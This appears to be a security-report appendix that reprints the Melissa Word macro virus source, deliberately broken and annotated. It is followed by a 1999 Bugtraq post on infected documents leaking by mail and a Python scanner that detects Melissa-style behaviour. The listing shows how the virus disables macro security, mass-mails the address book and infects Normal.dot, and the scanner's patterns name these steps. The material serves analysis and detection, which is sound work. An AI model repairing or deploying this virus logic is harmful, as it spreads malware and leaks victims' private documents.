NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form.  We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa.  Text comments have been inserted at
the "famous" locations, preceded by three asterisks "***".

*** Begins by checking security, the environment, and whether already
infected

Private Sub Document_Open()
  On Error Resume Next
  If System.PrivateProfileString("",
       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
       "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("",
       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
       "Level") = 1&
  Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
    Options.SaveNormalPrompt = (1 - 1)
  End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
    "... by Kwyjibo" Then
  If UngaDasOutlook = "Inlook" Then
    DasMapName.Logon "profile", "password"
    For y = 1 To DasMapName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakOffASlice.Recipients.Add Peep
            x++
            If x < 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakOffASlice.Subject = "Important Message From " &
              Application.UserName
         BreakUmOffASlice.Body =
            "Here is that document you asked for ... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From". This could,
of course, change in future versions ***

         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
  DasMapName.Logoff
  End If
  System.PrivateProfileString("",
      "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
       "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then _
    ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
  End If
  If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then _
      NTI1.CodeModule.DeleteLines 1, NTCL
      Set ToInfect = NTI1
      NTI1.Name = "Melissa"
      DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo END
      If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = ""
          ADI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
          ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
          BGN = BGN + 1
        Loop
      End If
      If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = ""
          NTI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
          ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
            BGN = BGN + 1
        Loop
      End If
CYA:
      If NTCL <> 0 And ADCL = 0 And
          (InStr(1, ActiveDocument.Name, "Document") = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
        ActiveDocument.Saved = True
      End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
    plus triple-word-score, plus fifty points for using all my letters.
    Game's over.  I'm outta here."

End Sub

*** The lines above are some of the most published information about
this virus.  Although you can look for the virus with intrusion detection
and other string-matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code would change these strings. ***

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 21:40:59 -0600
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: "Leaking" of docs via Melissa

An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.

    Simple Nomad    //
 thegnome@nmrc.org  //  ....no rest for the Wicca'd....
    www.nmrc.org    //
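As an added example (not code from the SANS report or from either Bugtraq poster), here is a defender-side scanner that applies the appendix's closing point and Simple Nomad's advice: it scores a mail message on several independent behavioural indicators visible in the Melissa listing (Outlook automation, the address-book walk, self-attachment of the active document, the Word security-level downgrade, the VBProject self-copy) and on the known subject and body text, rather than on the single "Kwyjibo" string, and it is applied to outbound as well as inbound messages. The indicator weights, the threshold, the MailMessage structure and every sample message are constructed assumptions for this example; extracting the macro source from a .doc (for instance with oletools' olevba) is outside its scope.

```python
import re
from dataclasses import dataclass, field

# Indicators drawn from the Melissa listing: (name, pattern, weight).
# Weights and the threshold are assumptions for this example; tune them
# against your own mail traffic and false-positive tolerance.
THRESHOLD = 5
MACRO_INDICATORS = [
    ("outlook_automation",
     re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', re.I), 2),
    ("address_book_walk",
     re.compile(r'\.AddressLists\b.*?\.AddressEntries\b', re.I | re.S), 2),
    ("self_attach",
     re.compile(r'Attachments\.Add\s+ActiveDocument\.FullName', re.I), 3),
    ("auto_send", re.compile(r'\.Send\b', re.I), 1),
    ("security_downgrade",
     re.compile(r'Word\\Security.*?"Level"', re.I | re.S), 2),
    ("vba_self_copy", re.compile(r'VBProject\.VBComponents', re.I), 2),
    # The marker everyone greps for; weighted low because it is trivially renamed.
    ("marker_string", re.compile(r'Kwyjibo', re.I), 1),
]
SUBJECT_PATTERN = re.compile(r'^\s*Important Message From\b', re.I)
BODY_PATTERN = re.compile(r'Here is that document you asked for', re.I)


@dataclass
class MailMessage:
    direction: str          # "inbound" or "outbound"; both are scanned
    subject: str
    body: str
    macro_source: str = ""  # VBA text already extracted from the attachment


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def scan_message(msg: MailMessage) -> ScanResult:
    """Score one message; direction is deliberately ignored here."""
    result = ScanResult()
    if SUBJECT_PATTERN.search(msg.subject):
        result.hits.append("subject_line")
        result.score += 2
    if BODY_PATTERN.search(msg.body):
        result.hits.append("body_text")
        result.score += 2
    for name, pattern, weight in MACRO_INDICATORS:
        if pattern.search(msg.macro_source):
            result.hits.append(name)
            result.score += weight
    return result


def quarantine_list(messages):
    """(direction, subject) of every message to hold, inbound or outbound."""
    return [(m.direction, m.subject) for m in messages
            if scan_message(m).suspicious]


# Constructed samples. VARIANT_MACRO is a neutered fragment that only names
# the API calls a Melissa-style mailer makes; it does nothing on its own and
# contains no "Kwyjibo" marker, which is the point of the test.
VARIANT_MACRO = '''
Set app = CreateObject("Outlook.Application")
For y = 1 To ns.AddressLists.Count
  For oo = 1 To book.AddressEntries.Count
  Next oo
  item.Attachments.Add ActiveDocument.FullName
  item.Send
Next y
'''
BENIGN_MACRO = '''
Sub FormatReport()
  Selection.Font.Bold = True
  ActiveDocument.Save
End Sub
'''
MARKER_ONLY_MACRO = "' notes on the Kwyjibo virus for the help desk\nSub Notes()\nEnd Sub\n"

SAMPLES = [
    MailMessage("inbound", "Important Message From Alice",
                "Here is that document you asked for ... don't show anyone else ;-)",
                VARIANT_MACRO),
    # A leaked internal document going out: same indicators, other direction.
    MailMessage("outbound", "Important Message From Bob",
                "Here is that document you asked for ...", VARIANT_MACRO),
    MailMessage("inbound", "Q1 report", "See attached.", BENIGN_MACRO),
    MailMessage("outbound", "Re: lunch", "Sure, noon works.", ""),
    # Mentions the marker but does nothing: grepping for "Kwyjibo" alone misfires.
    MailMessage("inbound", "Melissa write-up", "Notes for the team", MARKER_ONLY_MACRO),
]

if __name__ == "__main__":
    for m in SAMPLES:
        res = scan_message(m)
        flag = "QUARANTINE" if res.suspicious else "ok"
        print(f"{m.direction:8} {m.subject[:28]:28} score={res.score:2} {flag} {res.hits}")
```

The two infected samples score well above the threshold without the "Kwyjibo" marker ever matching, the help-desk note that merely mentions the marker scores 1 and passes, and the quarantine list contains the outbound message as well as the inbound one, which is the case Simple Nomad describes.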